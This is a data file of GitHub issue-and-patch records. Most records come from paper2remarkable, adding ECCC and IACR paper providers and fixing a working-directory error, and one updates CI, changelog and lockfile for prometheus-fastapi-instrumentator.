Dataset columns:

- repo: string, lengths 7–60
- instance_id: string, lengths 11–64
- base_commit: string, length 40
- patch: string, lengths 83–793k
- test_patch: string, 1 distinct value
- problem_statement: string, lengths 22–112k
- hints_text: string, lengths 0–189k
- created_at: timestamp[ns], 2015-02-23 20:51:45 to 2024-12-13 21:31:14
- environment_setup_commit: string, 1 distinct value
- version: string, 1 distinct value
- FAIL_TO_PASS: sequence, length 0
- PASS_TO_PASS: sequence, length 0

Each record below lists these fields in order, separated by `|`.
GjjvdBurg/paper2remarkable | GjjvdBurg__paper2remarkable-114 | d1772da6b86c58b4dbc9fb514d151b2fcbf1672d | diff --git a/paper2remarkable/providers/__init__.py b/paper2remarkable/providers/__init__.py
index 5130147..e574b80 100644
--- a/paper2remarkable/providers/__init__.py
+++ b/paper2remarkable/providers/__init__.py
@@ -5,6 +5,7 @@
from .arxiv import Arxiv
from .citeseerx import CiteSeerX
from .cvf import CVF
+from .eccc import ECCC
from .html import HTML
from .jmlr import JMLR
from .local import LocalFile
@@ -28,6 +29,7 @@
Arxiv,
CiteSeerX,
CVF,
+ ECCC,
JMLR,
Nature,
NBER,
diff --git a/paper2remarkable/providers/eccc.py b/paper2remarkable/providers/eccc.py
new file mode 100644
index 0000000..f6a6bae
--- /dev/null
+++ b/paper2remarkable/providers/eccc.py
@@ -0,0 +1,86 @@
+# -*- coding: utf-8 -*-
+
+"""Provider for Electronic Colloquium on Computational Complexity
+
+Author: G.J.J. van den Burg
+License: See LICENSE file
+Copyright: 2021, G.J.J. van den Burg
+
+"""
+
+import bs4
+import re
+
+from ._info import Informer
+from ._base import Provider
+from ..exceptions import URLResolutionError
+from ..log import Logger
+
+logger = Logger()
+
+
+class ECCCInformer(Informer):
+ def _get_paper_div(self, soup):
+ h3 = soup.find(lambda t: t.name == "h3" and t.get_text() == "Paper:")
+ div = h3.find_next_sibling("div")
+ return bs4.BeautifulSoup(div.prettify(), "html.parser")
+
+ def get_title(self, soup):
+ divsoup = self._get_paper_div(soup)
+ h4 = divsoup.find("h4")
+ if not h4:
+ logger.warning(
+ "Couldn't determine title information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ return h4.get_text().strip()
+
+ def get_authors(self, soup):
+ divsoup = self._get_paper_div(soup)
+ aa = divsoup.find_all(
+ lambda t: t.name == "a" and t.get("href").startswith("/author/")
+ )
+ if not aa:
+ logger.warning(
+ "Couldn't determine author information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ authors = [a.get_text() for a in aa]
+ return self._format_authors(authors, sep=" ", idx=-1)
+
+ def get_year(self, soup):
+ divsoup = self._get_paper_div(soup)
+ line = next(
+ (l for l in divsoup.text.split("\n") if "Publication: " in l), None
+ )
+ if line is None:
+ logger.warning(
+ "Couldn't determine year information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ year = line.strip().split(" ")[3] # bit lazy
+ return year
+
+
+class ECCC(Provider):
+
+ re_abs = "https?://eccc.weizmann.ac.il/report/\d{4}/\d+/?$"
+ re_pdf = "https?://eccc.weizmann.ac.il/report/\d{4}/\d+/download/?$"
+
+ def __init__(self, *args, **kwargs):
+ super().__init__(*args, **kwargs)
+ self.informer = ECCCInformer()
+
+ def get_abs_pdf_urls(self, url):
+ if re.match(self.re_abs, url):
+ abs_url = url
+ pdf_url = url.rstrip("/") + "/download"
+ elif re.match(self.re_pdf, url):
+ abs_url = url.rstrip("/")[: -len("/download")]
+ pdf_url = url
+ else:
+ raise URLResolutionError("ECCC", url)
+ return abs_url, pdf_url
+
+ def validate(src):
+ return re.match(ECCC.re_abs, src) or re.match(ECCC.re_pdf, src)
| New source recommendations
I'd just quickly like to suggest two new sources that appear in theoretical computer science/cryptography, namely:
* IACR's Eprint: It is located at https://eprint.iacr.org/ . The format is that the abstract of a paper is contained at https://eprint.iacr.org/2021/489 , and the paper itself is found by appending .pdf to this https://eprint.iacr.org/2021/489.pdf
* ECCC: This is located at https://eccc.weizmann.ac.il/eccc/ . The most useful section of it is probably the `reports` section. A generic report is located at https://eccc.weizmann.ac.il/report/2021/052/ , and it can be downloaded by visiting https://eccc.weizmann.ac.il/report/2021/052/download .
| Thanks for the suggestions @mark-schultz, I'll see what I can do! | 2021-05-30T15:34:09 | 0.0 | [] | [] |
||
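The ECCC provider patch in the record above centers on two URL regexes and a small resolution routine. A minimal standalone sketch of that same URL resolution logic (extracted from the patch, using only Python's `re` module; the error type is simplified to `ValueError` instead of the project's `URLResolutionError`):

```python
import re

# URL patterns taken from the ECCC provider patch above
RE_ABS = r"https?://eccc.weizmann.ac.il/report/\d{4}/\d+/?$"
RE_PDF = r"https?://eccc.weizmann.ac.il/report/\d{4}/\d+/download/?$"


def get_abs_pdf_urls(url: str) -> tuple:
    """Resolve an ECCC report URL to its (abstract, download) pair."""
    if re.match(RE_ABS, url):
        # Abstract page given: derive the download URL by appending /download
        return url, url.rstrip("/") + "/download"
    if re.match(RE_PDF, url):
        # Download URL given: strip the /download suffix for the abstract page
        return url.rstrip("/")[: -len("/download")], url
    raise ValueError(f"Unsupported ECCC URL: {url}")


abs_url, pdf_url = get_abs_pdf_urls("https://eccc.weizmann.ac.il/report/2021/052/")
print(abs_url)  # https://eccc.weizmann.ac.il/report/2021/052/
print(pdf_url)  # https://eccc.weizmann.ac.il/report/2021/052/download
```

Both URL forms from the issue report resolve to the same pair, which is what lets the tool accept either link style.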
GjjvdBurg/paper2remarkable | GjjvdBurg__paper2remarkable-113 | d1772da6b86c58b4dbc9fb514d151b2fcbf1672d | diff --git a/paper2remarkable/crop.py b/paper2remarkable/crop.py
index 16d050e..6e4a177 100644
--- a/paper2remarkable/crop.py
+++ b/paper2remarkable/crop.py
@@ -180,7 +180,7 @@ def get_raw_bbox_pdftoppm(self, filename, resolution=72):
filename,
]
- im = subprocess.check_output(cmd)
+ im = subprocess.check_output(cmd, stderr=subprocess.DEVNULL)
im = io.BytesIO(im)
id_ = im.readline().rstrip(b"\n")
diff --git a/paper2remarkable/providers/__init__.py b/paper2remarkable/providers/__init__.py
index 5130147..fb12a21 100644
--- a/paper2remarkable/providers/__init__.py
+++ b/paper2remarkable/providers/__init__.py
@@ -6,6 +6,7 @@
from .citeseerx import CiteSeerX
from .cvf import CVF
from .html import HTML
+from .iacr import IACR
from .jmlr import JMLR
from .local import LocalFile
from .nature import Nature
@@ -28,6 +29,7 @@
Arxiv,
CiteSeerX,
CVF,
+ IACR,
JMLR,
Nature,
NBER,
diff --git a/paper2remarkable/providers/_base.py b/paper2remarkable/providers/_base.py
index 56d61e5..9357b91 100644
--- a/paper2remarkable/providers/_base.py
+++ b/paper2remarkable/providers/_base.py
@@ -142,13 +142,14 @@ def compress_pdf(self, in_pdf, out_pdf):
"%s failed to compress the PDF file." % self.pdftool
)
- def rewrite_pdf(self, in_pdf, out_pdf=None):
- """Re-write the pdf using Ghostscript
+ def rewrite_pdf(self, in_file, out_pdf=None):
+ """Re-write the ps or pdf using Ghostscript
- This helps avoid issues in dearxiv due to nested pdfs.
+ This helps avoid issues in dearxiv due to nested pdfs and enables
+ support for postscript files.
"""
if out_pdf is None:
- out_pdf = os.path.splitext(in_pdf)[0] + "-rewrite.pdf"
+ out_pdf = os.path.splitext(in_file)[0] + "-rewrite.pdf"
status = subprocess.call(
[
@@ -157,7 +158,7 @@ def rewrite_pdf(self, in_pdf, out_pdf=None):
"-dQUIET",
"-o",
out_pdf,
- in_pdf,
+ in_file,
]
)
if not status == 0:
@@ -169,6 +170,7 @@ def rewrite_pdf(self, in_pdf, out_pdf=None):
def uncompress_pdf(self, in_pdf, out_pdf):
""" Uncompress a pdf file """
+ logger.info("Uncompressing with {self.pdftool} ...")
if self.pdftool == "pdftk":
status = subprocess.call(
[
diff --git a/paper2remarkable/providers/iacr.py b/paper2remarkable/providers/iacr.py
new file mode 100644
index 0000000..f91d2e5
--- /dev/null
+++ b/paper2remarkable/providers/iacr.py
@@ -0,0 +1,111 @@
+# -*- coding: utf-8 -*-
+
+"""Provider for IACR's eprints
+
+Author: G.J.J. van den Burg
+License: See LICENSE file
+Copyright: 2019, G.J.J. van den Burg
+
+"""
+
+import bs4
+import os
+import re
+import urllib.parse
+
+from ._info import Informer
+from ._base import Provider
+from ..exceptions import URLResolutionError
+from ..log import Logger
+from ..utils import get_page_with_retry
+
+logger = Logger()
+
+
+class IACRInformer(Informer):
+ def get_title(self, soup):
+ title = soup.find_all("title")
+ if not title:
+ logger.warning(
+ "Couldn't determine title information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ return title[0].get_text().split("-", maxsplit=1)[-1]
+
+ def get_authors(self, soup):
+ i = soup.find_all("i")
+ if not i:
+ logger.warning(
+ "Couldn't determine author information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ authors = i[0].get_text()
+ authors = authors.replace(" ", " ")
+ authors = authors.split(" and ")
+ return self._format_authors(authors, sep=" ", idx=-1)
+
+ def get_year(self, soup):
+ h2 = soup.find_all("h2")
+ if not h2:
+ logger.warning(
+ "Couldn't determine year information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ text = h2[0].get_text()
+ report = text.split(":", maxsplit=1)[-1]
+ year_num = report.strip().split(" ")[1]
+ year = year_num.split("/")[0]
+ return year
+
+
+class IACR(Provider):
+
+ re_abs = "https?://eprint.iacr.org/\d{4}/\d+$"
+ re_pdf = "https?://eprint.iacr.org/\d{4}/\d+\.pdf$"
+ re_ps = "https?://eprint.iacr.org/\d{4}/\d+\.ps$"
+
+ def __init__(self, *args, **kwargs):
+ super().__init__(*args, **kwargs)
+ self.informer = IACRInformer()
+
+ def _get_doc_url(self, abs_url):
+ page = get_page_with_retry(abs_url)
+ soup = bs4.BeautifulSoup(page, "html.parser")
+
+ bb = soup.find_all("b")
+ b = next((b for b in bb if "Available format" in b.get_text()), None)
+ if b is None:
+ # Fallback
+ return abs_url + ".pdf"
+ aa = b.find_next_siblings("a")
+ a = next((a for a in aa if "PDF" in a.get_text()), None)
+ if not a is None:
+ return urllib.parse.urljoin(abs_url, a.get("href"))
+ a = next((a for a in aa if "Postscript (PS)" in a.get_text()), None)
+ if not a is None:
+ return urllib.parse.urljoin(abs_url, a.get("href"))
+ # Fallback
+ return abs_url + ".pdf"
+
+ def get_abs_pdf_urls(self, url):
+ if re.match(self.re_abs, url):
+ abs_url = url
+ pdf_url = self._get_doc_url(url)
+ elif re.match(self.re_pdf, url):
+ abs_url = url[: -len(".pdf")]
+ pdf_url = url
+ elif re.match(self.re_ps, url):
+ abs_url = url[: -len(".ps")]
+ pdf_url = url
+ else:
+ raise URLResolutionError("IACR", url)
+ return abs_url, pdf_url
+
+ def retrieve_pdf(self, pdf_url, filename):
+ # Bit hacky, can consider adding first-class PS support
+ tmpfilename = os.path.splitext(filename)[0] + "-tmp.pdf"
+ super().retrieve_pdf(pdf_url, tmpfilename)
+ self.rewrite_pdf(tmpfilename, out_pdf=filename)
+
+ def validate(src):
+ return re.match(IACR.re_abs, src) or re.match(IACR.re_pdf, src)
| New source recommendations
I'd just quickly like to suggest two new sources that appear in theoretical computer science/cryptography, namely:
* IACR's Eprint: It is located at https://eprint.iacr.org/ . The format is that the abstract of a paper is contained at https://eprint.iacr.org/2021/489 , and the paper itself is found by appending .pdf to this https://eprint.iacr.org/2021/489.pdf
* ECCC: This is located at https://eccc.weizmann.ac.il/eccc/ . The most useful section of it is probably the `reports` section. A generic report is located at https://eccc.weizmann.ac.il/report/2021/052/ , and it can be downloaded by visiting https://eccc.weizmann.ac.il/report/2021/052/download .
| Thanks for the suggestions @mark-schultz, I'll see what I can do! | 2021-05-30T14:48:10 | 0.0 | [] | [] |
||
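The IACR provider patch above accepts three URL shapes (abstract, `.pdf`, `.ps`). A simplified sketch of its `get_abs_pdf_urls` logic: the real provider additionally scrapes the abstract page to prefer PDF over PostScript, while this sketch just appends `.pdf`, matching the patch's fallback path (error type simplified to `ValueError`):

```python
import re

# URL patterns from the IACR provider patch above
RE_ABS = r"https?://eprint.iacr.org/\d{4}/\d+$"
RE_PDF = r"https?://eprint.iacr.org/\d{4}/\d+\.pdf$"
RE_PS = r"https?://eprint.iacr.org/\d{4}/\d+\.ps$"


def get_abs_pdf_urls(url: str) -> tuple:
    """Resolve an IACR eprint URL to its (abstract, document) pair."""
    if re.match(RE_ABS, url):
        # Abstract page given: fall back to appending .pdf
        return url, url + ".pdf"
    if re.match(RE_PDF, url):
        return url[: -len(".pdf")], url
    if re.match(RE_PS, url):
        return url[: -len(".ps")], url
    raise ValueError(f"Unsupported IACR URL: {url}")


print(get_abs_pdf_urls("https://eprint.iacr.org/2021/489"))
```

PostScript inputs are still resolved to the abstract page; the patch then converts the downloaded `.ps` file via the Ghostscript `rewrite_pdf` step.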
GjjvdBurg/paper2remarkable | GjjvdBurg__paper2remarkable-112 | 94308fa2625c63219d880bdf5285de7fd16ca29f | diff --git a/paper2remarkable/providers/_base.py b/paper2remarkable/providers/_base.py
index 369d566..56d61e5 100644
--- a/paper2remarkable/providers/_base.py
+++ b/paper2remarkable/providers/_base.py
@@ -20,6 +20,7 @@
from ..pdf_ops import prepare_pdf, blank_pdf, shrink_pdf
from ..utils import (
assert_file_is_pdf,
+ chdir,
check_pdftool,
download_url,
follow_redirects,
@@ -211,33 +212,33 @@ def run(self, src, filename=None):
self.initial_dir = os.getcwd()
with tempfile.TemporaryDirectory(prefix="p2r_") as working_dir:
- os.chdir(working_dir)
- self.retrieve_pdf(pdf_url, tmp_filename)
-
- assert_file_is_pdf(tmp_filename)
-
- intermediate_fname = tmp_filename
- for opname, op in self.operations:
- intermediate_fname = op(intermediate_fname)
-
- shutil.copy(intermediate_fname, clean_filename)
-
- if self.debug:
- print("Paused in debug mode in dir: %s" % working_dir)
- print("Press enter to exit.")
- return input()
-
- if self.upload:
- return upload_to_remarkable(
- clean_filename,
- remarkable_dir=self.remarkable_dir,
- rmapi_path=self.rmapi_path,
- )
-
- target_path = os.path.join(self.initial_dir, clean_filename)
- while os.path.exists(target_path):
- base = os.path.splitext(target_path)[0]
- target_path = base + "_.pdf"
- shutil.move(clean_filename, target_path)
- os.chdir(self.initial_dir)
+ with chdir(working_dir):
+ self.retrieve_pdf(pdf_url, tmp_filename)
+
+ assert_file_is_pdf(tmp_filename)
+
+ intermediate_fname = tmp_filename
+ for opname, op in self.operations:
+ intermediate_fname = op(intermediate_fname)
+
+ shutil.copy(intermediate_fname, clean_filename)
+
+ if self.debug:
+ print("Paused in debug mode in dir: %s" % working_dir)
+ print("Press enter to exit.")
+ return input()
+
+ if self.upload:
+ return upload_to_remarkable(
+ clean_filename,
+ remarkable_dir=self.remarkable_dir,
+ rmapi_path=self.rmapi_path,
+ )
+
+ target_path = os.path.join(self.initial_dir, clean_filename)
+ while os.path.exists(target_path):
+ base = os.path.splitext(target_path)[0]
+ target_path = base + "_.pdf"
+ shutil.move(clean_filename, target_path)
+
return target_path
diff --git a/paper2remarkable/ui.py b/paper2remarkable/ui.py
index 1d1e011..c05961e 100644
--- a/paper2remarkable/ui.py
+++ b/paper2remarkable/ui.py
@@ -280,6 +280,31 @@ def exception_handler(exception_type, value, traceback):
sys.excepthook = exception_handler
+def runner(inputs, filenames, options, remarkable_dir="/", debug=False):
+ if not len(inputs) == len(filenames):
+ raise ValueError("Number of inputs and filenames must be the same")
+ for cli_input, filename in zip(inputs, filenames):
+ provider, new_input, cookiejar = choose_provider(cli_input)
+ prov = provider(
+ verbose=options["core"]["verbose"],
+ upload=options["core"]["upload"],
+ debug=debug,
+ experimental=options["core"]["experimental"],
+ crop=options["core"]["crop"],
+ blank=options["core"]["blank"],
+ remarkable_dir=remarkable_dir,
+ rmapi_path=options["system"]["rmapi"],
+ pdftoppm_path=options["system"]["pdftoppm"],
+ pdftk_path=options["system"]["pdftk"],
+ qpdf_path=options["system"]["qpdf"],
+ gs_path=options["system"]["gs"],
+ css=options["html"]["css"],
+ font_urls=options["html"]["font_urls"],
+ cookiejar=cookiejar,
+ )
+ prov.run(new_input, filename=filename)
+
+
def main():
args = parse_args()
set_excepthook(args.debug)
@@ -305,23 +330,4 @@ def main():
[None] * len(args.input) if not args.filename else args.filename
)
- for cli_input, filename in zip(args.input, filenames):
- provider, new_input, cookiejar = choose_provider(cli_input)
- prov = provider(
- verbose=options["core"]["verbose"],
- upload=options["core"]["upload"],
- debug=args.debug,
- experimental=options["core"]["experimental"],
- crop=options["core"]["crop"],
- blank=options["core"]["blank"],
- remarkable_dir=args.remarkable_dir,
- rmapi_path=options["system"]["rmapi"],
- pdftoppm_path=options["system"]["pdftoppm"],
- pdftk_path=options["system"]["pdftk"],
- qpdf_path=options["system"]["qpdf"],
- gs_path=options["system"]["gs"],
- css=options["html"]["css"],
- font_urls=options["html"]["font_urls"],
- cookiejar=cookiejar,
- )
- prov.run(new_input, filename=filename)
+ runner(args.input, filenames, options, debug=args.debug)
diff --git a/paper2remarkable/utils.py b/paper2remarkable/utils.py
index 0003103..5ea25fd 100644
--- a/paper2remarkable/utils.py
+++ b/paper2remarkable/utils.py
@@ -8,6 +8,7 @@
"""
+import os
import regex
import requests
import string
@@ -203,3 +204,18 @@ def check_pdftool(pdftk_path, qpdf_path):
if status == 0:
return "qpdf"
raise NoPDFToolError
+
+
+class chdir:
+ """Change directory in context and return to original on exit or failure"""
+
+ def __init__(self, target: str):
+ self._target = target
+ self._original_dir = None
+
+ def __enter__(self):
+ self._original_dir = os.getcwd()
+ os.chdir(self._target)
+
+ def __exit__(self, exc_type, exc_value, traceback):
+ os.chdir(self._original_dir)
| [Errno 2] No such file or directory
When inputting multiple papers I get a directory error:
```
>>> p2r -V
0.9.3
>>> p2r -v -p /papers/arxiv/24-05-2021/ https://arxiv.org/abs/2105.09956 https://arxiv.org/abs/2105.10474 https://arxiv.org/abs/2105.10163
2021-05-24 09:58:14 - INFO - Starting Arxiv provider
2021-05-24 09:58:14 - INFO - Generating output filename
2021-05-24 09:58:14 - INFO - Getting paper info
2021-05-24 09:58:15 - INFO - Downloaded url: https://arxiv.org/abs/2105.09956
2021-05-24 09:58:15 - INFO - Created filename: Sazonova_et_al_-_Are_All_Post-Starbursts_Mergers_HST_Reveals_Hidden_Disturbances_in_the_Majority_of_PSBs_2021.pdf
2021-05-24 09:58:15 - INFO - Downloading file at url: https://arxiv.org/pdf/2105.09956.pdf
2021-05-24 09:58:33 - INFO - Downloaded url: https://arxiv.org/pdf/2105.09956.pdf
2021-05-24 09:58:34 - INFO - Removing arXiv timestamp ... success
2021-05-24 09:59:10 - INFO - Preparing PDF using crop operation
2021-05-24 09:59:19 - INFO - Processing pages ... (10/31)
2021-05-24 09:59:26 - INFO - Processing pages ... (20/31)
2021-05-24 09:59:29 - INFO - Processing pages ... (30/31)
2021-05-24 09:59:32 - INFO - Processing pages ... (31/31)
2021-05-24 09:59:32 - INFO - Shrinking pdf file ...
2021-05-24 09:59:51 - INFO - Shrinking has no effect for this file, using original.
2021-05-24 09:59:51 - INFO - Starting upload to reMarkable
2021-05-24 10:00:03 - INFO - Upload successful.
2021-05-24 10:00:03 - INFO - Starting Arxiv provider
2021-05-24 10:00:03 - INFO - Generating output filename
2021-05-24 10:00:03 - INFO - Getting paper info
2021-05-24 10:00:04 - INFO - Downloaded url: https://arxiv.org/abs/2105.10474
2021-05-24 10:00:04 - INFO - Created filename: Zhang_et_al_-_Trinity_I_Self-Consistently_Modeling_the_Dark_Matter_Halo-Galaxy-Supermassive_Black_Hole_Connection_From_Z_0-10_2021.pdf
[Errno 2] No such file or directory
```
However, when I do them one by one, it succeeds
PS. this is such a great tool!
| 2021-05-29T13:55:43 | 0.0 | [] | [] |
|||
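The fix in the record above replaces a bare `os.chdir` with a `chdir` context manager so the original working directory is restored even when processing a paper fails, which is what caused the `[Errno 2]` on the second paper (the process was still inside the first paper's deleted temp dir). A self-contained sketch of the same pattern, copied from the patch with a small demonstration:

```python
import os
import tempfile


class chdir:
    """Change directory in context and return to original on exit or failure."""

    def __init__(self, target: str):
        self._target = target
        self._original_dir = None

    def __enter__(self):
        self._original_dir = os.getcwd()
        os.chdir(self._target)

    def __exit__(self, exc_type, exc_value, traceback):
        # Runs on both normal exit and exceptions, unlike a trailing os.chdir
        os.chdir(self._original_dir)


before = os.getcwd()
with tempfile.TemporaryDirectory() as tmp:
    try:
        with chdir(tmp):
            raise RuntimeError("simulated failure during download")
    except RuntimeError:
        pass
assert os.getcwd() == before  # cwd restored despite the exception
```

Python 3.11 later added an equivalent `contextlib.chdir` to the standard library; this project defines its own because it supports older Python versions.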
trallnag/prometheus-fastapi-instrumentator | trallnag__prometheus-fastapi-instrumentator-229 | c8585927771a8dabc32b5dea8051e79207a3fdcb | diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml
index 331e2fb..02c1ada 100644
--- a/.github/workflows/ci.yaml
+++ b/.github/workflows/ci.yaml
@@ -69,10 +69,10 @@ jobs:
- name: Run multi process tests with Pytest
run: |
- export PROMETHEUS_MULTIPROC_DIR=/tmp/one-two-three
+ export PROMETHEUS_MULTIPROC_DIR=/tmp/pfi-tests/multiproc
rm -rf $PROMETHEUS_MULTIPROC_DIR
mkdir -p $PROMETHEUS_MULTIPROC_DIR
- poetry run pytest -k test_multiprocess \
+ poetry run pytest -k test_multiproc \
--cov-append --cov-report=term-missing --cov-report=xml --cov=src
- name: Upload coverage to Codecov
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 77e465d..bc2c8fe 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,6 +9,17 @@ and adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0).
### Fixed
+- Fixed multi process mode in `expose()` method that handles the `/metrics`
+ endpoint. Due to reusing the registry assigned to the instrumentator it could
+ lead to duplicated metrics. Now the endpoint follows recommendation from
+ Prometheus client library documentation. Also improved multi process unit
+ tests. Closed issue
+ [#228](https://github.com/trallnag/prometheus-fastapi-instrumentator/issues/228)
+ and
+ [#227](https://github.com/trallnag/prometheus-fastapi-instrumentator/issues/227).
+ Fixed in pull request
+ [#229](https://github.com/trallnag/prometheus-fastapi-instrumentator/pull/229).
+
- Fixed `NameError` and "Duplicated timeseries..." errors that started to occur
with latest versions of Starlette / FastAPI in combination with multiple
middlewares. Instrumentation closures are now optional and the instrumentator
diff --git a/Taskfile.yaml b/Taskfile.yaml
index 045e329..2b4a7cd 100644
--- a/Taskfile.yaml
+++ b/Taskfile.yaml
@@ -5,6 +5,7 @@ tasks:
- task: fmt
- task: lint
- task: test
+ - task: test-mp
fmt:
desc: Run formatters.
@@ -22,14 +23,17 @@ tasks:
test:
desc: Run tests.
cmds:
- - poetry run pytest --cov-report=term-missing --cov-report=xml --cov=src
+ - poetry run pytest {{ .COVERAGE }}
+ vars:
+ COVERAGE: --cov-report=term-missing --cov-report=xml --cov=src
test-mp:
desc: Run multi process tests.
cmds:
- rm -rf $PROMETHEUS_MULTIPROC_DIR
- mkdir -p $PROMETHEUS_MULTIPROC_DIR
- - poetry run pytest -k test_multiprocess
- --cov-append --cov-report=term-missing --cov-report=xml --cov=src
+ - poetry run pytest -k test_multiproc {{ .COVERAGE }}
+ vars:
+ COVERAGE: --cov-append --cov-report=term-missing --cov-report=xml --cov=src
env:
- PROMETHEUS_MULTIPROC_DIR: /tmp/prometheus-fastapi-instrumentator/multiproc
+ PROMETHEUS_MULTIPROC_DIR: /tmp/pfi-tests/multiproc
diff --git a/poetry.lock b/poetry.lock
index c481036..94dc752 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -79,32 +79,46 @@ tests-no-zope = ["cloudpickle", "cloudpickle", "hypothesis", "hypothesis", "mypy
[[package]]
name = "black"
-version = "22.12.0"
+version = "23.1.0"
description = "The uncompromising code formatter."
category = "dev"
optional = false
python-versions = ">=3.7"
files = [
- {file = "black-22.12.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9eedd20838bd5d75b80c9f5487dbcb06836a43833a37846cf1d8c1cc01cef59d"},
- {file = "black-22.12.0-cp310-cp310-win_amd64.whl", hash = "sha256:159a46a4947f73387b4d83e87ea006dbb2337eab6c879620a3ba52699b1f4351"},
- {file = "black-22.12.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d30b212bffeb1e252b31dd269dfae69dd17e06d92b87ad26e23890f3efea366f"},
- {file = "black-22.12.0-cp311-cp311-win_amd64.whl", hash = "sha256:7412e75863aa5c5411886804678b7d083c7c28421210180d67dfd8cf1221e1f4"},
- {file = "black-22.12.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c116eed0efb9ff870ded8b62fe9f28dd61ef6e9ddd28d83d7d264a38417dcee2"},
- {file = "black-22.12.0-cp37-cp37m-win_amd64.whl", hash = "sha256:1f58cbe16dfe8c12b7434e50ff889fa479072096d79f0a7f25e4ab8e94cd8350"},
- {file = "black-22.12.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:77d86c9f3db9b1bf6761244bc0b3572a546f5fe37917a044e02f3166d5aafa7d"},
- {file = "black-22.12.0-cp38-cp38-win_amd64.whl", hash = "sha256:82d9fe8fee3401e02e79767016b4907820a7dc28d70d137eb397b92ef3cc5bfc"},
- {file = "black-22.12.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:101c69b23df9b44247bd88e1d7e90154336ac4992502d4197bdac35dd7ee3320"},
- {file = "black-22.12.0-cp39-cp39-win_amd64.whl", hash = "sha256:559c7a1ba9a006226f09e4916060982fd27334ae1998e7a38b3f33a37f7a2148"},
- {file = "black-22.12.0-py3-none-any.whl", hash = "sha256:436cc9167dd28040ad90d3b404aec22cedf24a6e4d7de221bec2730ec0c97bcf"},
- {file = "black-22.12.0.tar.gz", hash = "sha256:229351e5a18ca30f447bf724d007f890f97e13af070bb6ad4c0a441cd7596a2f"},
+ {file = "black-23.1.0-cp310-cp310-macosx_10_16_arm64.whl", hash = "sha256:b6a92a41ee34b883b359998f0c8e6eb8e99803aa8bf3123bf2b2e6fec505a221"},
+ {file = "black-23.1.0-cp310-cp310-macosx_10_16_universal2.whl", hash = "sha256:57c18c5165c1dbe291d5306e53fb3988122890e57bd9b3dcb75f967f13411a26"},
+ {file = "black-23.1.0-cp310-cp310-macosx_10_16_x86_64.whl", hash = "sha256:9880d7d419bb7e709b37e28deb5e68a49227713b623c72b2b931028ea65f619b"},
+ {file = "black-23.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e6663f91b6feca5d06f2ccd49a10f254f9298cc1f7f49c46e498a0771b507104"},
+ {file = "black-23.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:9afd3f493666a0cd8f8df9a0200c6359ac53940cbde049dcb1a7eb6ee2dd7074"},
+ {file = "black-23.1.0-cp311-cp311-macosx_10_16_arm64.whl", hash = "sha256:bfffba28dc52a58f04492181392ee380e95262af14ee01d4bc7bb1b1c6ca8d27"},
+ {file = "black-23.1.0-cp311-cp311-macosx_10_16_universal2.whl", hash = "sha256:c1c476bc7b7d021321e7d93dc2cbd78ce103b84d5a4cf97ed535fbc0d6660648"},
+ {file = "black-23.1.0-cp311-cp311-macosx_10_16_x86_64.whl", hash = "sha256:382998821f58e5c8238d3166c492139573325287820963d2f7de4d518bd76958"},
+ {file = "black-23.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2bf649fda611c8550ca9d7592b69f0637218c2369b7744694c5e4902873b2f3a"},
+ {file = "black-23.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:121ca7f10b4a01fd99951234abdbd97728e1240be89fde18480ffac16503d481"},
+ {file = "black-23.1.0-cp37-cp37m-macosx_10_16_x86_64.whl", hash = "sha256:a8471939da5e824b891b25751955be52ee7f8a30a916d570a5ba8e0f2eb2ecad"},
+ {file = "black-23.1.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8178318cb74f98bc571eef19068f6ab5613b3e59d4f47771582f04e175570ed8"},
+ {file = "black-23.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:a436e7881d33acaf2536c46a454bb964a50eff59b21b51c6ccf5a40601fbef24"},
+ {file = "black-23.1.0-cp38-cp38-macosx_10_16_arm64.whl", hash = "sha256:a59db0a2094d2259c554676403fa2fac3473ccf1354c1c63eccf7ae65aac8ab6"},
+ {file = "black-23.1.0-cp38-cp38-macosx_10_16_universal2.whl", hash = "sha256:0052dba51dec07ed029ed61b18183942043e00008ec65d5028814afaab9a22fd"},
+ {file = "black-23.1.0-cp38-cp38-macosx_10_16_x86_64.whl", hash = "sha256:49f7b39e30f326a34b5c9a4213213a6b221d7ae9d58ec70df1c4a307cf2a1580"},
+ {file = "black-23.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:162e37d49e93bd6eb6f1afc3e17a3d23a823042530c37c3c42eeeaf026f38468"},
+ {file = "black-23.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:8b70eb40a78dfac24842458476135f9b99ab952dd3f2dab738c1881a9b38b753"},
+ {file = "black-23.1.0-cp39-cp39-macosx_10_16_arm64.whl", hash = "sha256:a29650759a6a0944e7cca036674655c2f0f63806ddecc45ed40b7b8aa314b651"},
+ {file = "black-23.1.0-cp39-cp39-macosx_10_16_universal2.whl", hash = "sha256:bb460c8561c8c1bec7824ecbc3ce085eb50005883a6203dcfb0122e95797ee06"},
+ {file = "black-23.1.0-cp39-cp39-macosx_10_16_x86_64.whl", hash = "sha256:c91dfc2c2a4e50df0026f88d2215e166616e0c80e86004d0003ece0488db2739"},
